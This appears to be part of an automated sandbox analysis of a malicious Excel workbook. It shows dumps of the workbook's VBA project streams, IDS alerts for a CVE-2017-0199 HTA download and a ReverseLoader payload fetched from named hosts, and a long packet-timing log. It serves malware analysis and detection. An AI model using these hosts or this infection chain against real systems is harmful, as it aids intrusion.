                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ~ X . . . o U u L u U . c . . 8 . ) . a 9 s o . . . . . . . . . . . \\ . p . . n > _ . 4 s I o a h z ) $ . . . k . X 5 ! * 4 v ] . # Q V . I s 6 p . . 2 p . . C . > @ = g } + < . . ) . , 7 x L . . d . ! 7 | . = B . . . . a . . . ` . . . = . . . . . h g b . . . . . 1 H " % . . . " . . . . . D . . . . . . . . . . . . . . . . R = . . . i W 1 . . 3 @ . . . g = . . . . " . . . 3 . . . . H . . . . . . ; N 1 . . . V . W . G L . n E . 4 ] . n 3 3 F 1 . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 de 7e 58 e7 1c 16 90 c8 1a 8d e6 6f 9b 81 b2 55 75 a2 4c 75 20 55 03 85 63 d7 8e 10 20 a9 38 1b 8d 29 04 91 61 39 f0 73 cf 6f aa e4 1b 94 86 c1 e1 00 02 00 b0 04 c1 00 02 00 ff 93 e2 00 00 00 5c 00 70 00 cd 9f c9 6e 3e 5f 0c 34 73 49 6f 61 68 7a 29 cc 24 97 1f e7 b7 99 05 99 84 6b 18 ad 58 35
                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                    CLSID:
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Stream Size:527
                                                                                                                    Entropy:5.247273285777718
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:I D = " { 3 B 9 A 0 B 0 D - 3 0 8 9 - 4 B 1 8 - A 5 3 3 - F A 4 C B 0 E D 6 F 7 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 1 9 3 6 4 8 C 6 8 8 C 6 8 8 C 6
                                                                                                                    Data Raw:49 44 3d 22 7b 33 42 39 41 30 42 30 44 2d 33 30 38 39 2d 34 42 31 38 2d 41 35 33 33 2d 46 41 34 43 42 30 45 44 36 46 37 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:104
                                                                                                                    Entropy:3.0488640812019017
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:2644
                                                                                                                    Entropy:4.00708770539415
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:553
                                                                                                                    Entropy:6.371760615953949
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . l i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                                                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 87 c1 6c 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-11T10:53:54.536095+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916223.95.235.2980TCP
                                                                                                                    2024-12-11T10:53:54.536447+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)123.95.235.2980192.168.2.2249162TCP
                                                                                                                    2024-12-11T10:53:59.563476+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916423.95.235.2980TCP
                                                                                                                    2024-12-11T10:53:59.563742+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)123.95.235.2980192.168.2.2249164TCP
                                                                                                                    2024-12-11T10:54:07.351485+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.224916523.95.235.2980TCP
                                                                                                                    2024-12-11T10:54:22.447546+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.2249168TCP
                                                                                                                    2024-12-11T10:54:22.930971+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224917223.95.235.2980TCP
                                                                                                                    2024-12-11T10:54:41.001291+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.2249174TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 11, 2024 10:53:50.821480036 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:50.821541071 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:50.821611881 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:50.827729940 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:50.827764034 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:52.607259989 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:52.607388020 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:52.613190889 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:52.613214970 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:52.613970041 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:52.614034891 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:52.687052011 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:52.731332064 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:53.279975891 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:53.280035019 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:53.280062914 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:53.280076981 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:53.280098915 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:53.280113935 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:53.281404018 CET49161443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:53.281424999 CET4434916154.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:53.299437046 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:53.418896914 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:53.418958902 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:53.419080019 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:53.538701057 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.535921097 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536005974 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536019087 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536094904 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.536447048 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536458969 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536470890 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536489964 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.536495924 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.536495924 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.536531925 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.536531925 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.537326097 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.537338018 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.537349939 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.537410021 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.559832096 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.655510902 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.655556917 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.655653000 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.659689903 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.659848928 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.728040934 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.728148937 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.728193998 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.728193998 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.732225895 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.732331038 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.732357025 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.732409000 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.740674973 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.740755081 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.740995884 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.741095066 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.749175072 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.749191046 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.749337912 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.757395029 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.757488012 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.757510900 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.757563114 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.765779972 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.765861034 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.765906096 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.765993118 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.774122000 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.774202108 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.774233103 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.774274111 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.782433987 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.782494068 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.782562017 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.782620907 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.791721106 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.791862965 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.791892052 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.791996002 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.798466921 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.798563957 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.798567057 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.798731089 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.806113958 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.806181908 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.806227922 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.806314945 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.848424911 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.848526001 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.848566055 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.848637104 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.928246975 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.928325891 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.928338051 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.930732012 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.930788994 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.930856943 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.930890083 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.934730053 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.935206890 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.935256004 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.935296059 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.938730955 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.939901114 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.939956903 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.940110922 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.942733049 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.944610119 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.944681883 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.944690943 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.946708918 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.949171066 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.949245930 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.949281931 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.950197935 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.953852892 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.953915119 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.953972101 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.954729080 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.958589077 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.958655119 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.958700895 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.959394932 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.963156939 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.963255882 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.963255882 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.966732025 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.967804909 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.967856884 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.967916965 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.968147993 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.972502947 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.972556114 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.972629070 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.974729061 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.977195978 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.977264881 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.977293015 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.977461100 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.980998993 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.981057882 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.981064081 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.981142998 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.984659910 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.984747887 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.984807968 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.984807968 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.988277912 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.988363028 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.988389969 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.988533974 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.995981932 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.996100903 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.996138096 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.996150017 CET804916223.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:54.996182919 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:54.996182919 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:55.250269890 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:55.250319958 CET4916280192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:55.966392040 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:55.966442108 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:55.966509104 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:55.977904081 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:55.977931976 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:57.553314924 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:57.553392887 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:57.558686018 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:57.558701992 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:57.559015989 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:57.559076071 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:57.640450954 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:57.683336020 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:58.235662937 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:58.235733986 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:58.235747099 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:58.236268044 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:58.237446070 CET49163443192.168.2.2254.150.207.131
                                                                                                                    Dec 11, 2024 10:53:58.237466097 CET4434916354.150.207.131192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:58.318562031 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:58.437972069 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:58.438210964 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:58.438482046 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:58.557693005 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563293934 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563334942 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563347101 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563476086 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.563741922 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563764095 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563783884 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563796997 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.563802958 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.563816071 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.563839912 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.564544916 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.564558983 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.564572096 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.564585924 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.564600945 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.569363117 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.682962894 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.683079958 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.683098078 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.683161020 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.755378008 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.755397081 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.755522013 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.757922888 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.757992983 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.758029938 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.758063078 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.766295910 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.766351938 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.766354084 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.766386986 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.774563074 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.774610043 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.774641037 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.774676085 CET4916480192.168.2.2223.95.235.29
                                                                                                                    Dec 11, 2024 10:53:59.783025980 CET804916423.95.235.29192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:59.783087969 CET4916480192.168.2.2223.95.235.29
